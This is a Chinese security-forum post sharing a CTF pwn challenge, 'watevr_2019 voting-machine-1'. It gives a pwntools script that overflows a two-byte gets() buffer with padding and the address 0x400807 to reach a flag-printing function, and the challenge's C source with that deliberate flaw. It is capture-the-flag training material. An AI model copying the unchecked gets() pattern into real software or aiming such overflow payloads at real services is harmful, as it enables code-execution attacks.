查看: 157|回复: 0

[Pwn] watevr_2019_pwn-voting-machine-1

[复制链接]
发表于 2020-5-1 19:16:06 | 显示全部楼层 |阅读模式
#This challenge is based on a simple BOF that occurs in gets(input) which later *can* redirect code execution
from pwn import *
import time

def main(ip, port, flag):
    try:
        r = remote(ip, port)
        r.sendline("A"*10 + "\x07\x08\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") #0000000000400807

        #we pad with 10 A's then inject the address in code which we want to redirect code to.
        #In this case super_secret_function
        response = b""
        time.sleep(4)
        response += r.recv()
        print("Response: " + str(response))
        if flag in str(response):
            print("Correct")
            exit(0)
        else:
            print("Incorrect")
            exit(1)
    except Exception as e:
        print("fail due to ")
        print(e)
        exit(1)

#Validation section
flag = input("Flag: ").replace("\n", "")
ip, port = input("service: ").split(":")
main(str(ip), int(port), str(flag))
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <unistd.h>
#include <signal.h>

void super_secret_function(){
  FILE *f;
  char c;
  f = fopen("/home/ctf/flag.txt", "r");
  if(f == NULL){
      printf("Cannot open flag.txt\n");
      exit(1);
  }
  c = fgetc(f);
  while(c != EOF){
      printf ("%c", c);
      c = fgetc(f);
  }
  fclose(f);
  exit(0);
}

void sig(int sign){
        exit(0);
}

int main(){
  signal(SIGALRM, sig);
  alarm(40);
  char input[2];
  printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
  printf("Today's vote will be regarding the administration of\n");
  printf("watevr CTF.\n");
  printf("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.\n");
  printf("Thanks!\n");
  printf("Vote: ");
  fflush(stdout);
  gets(input);
  printf("Thanks for voting!\n");
  return 0;
}


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046
微信公众号
快速回复 返回顶部 返回列表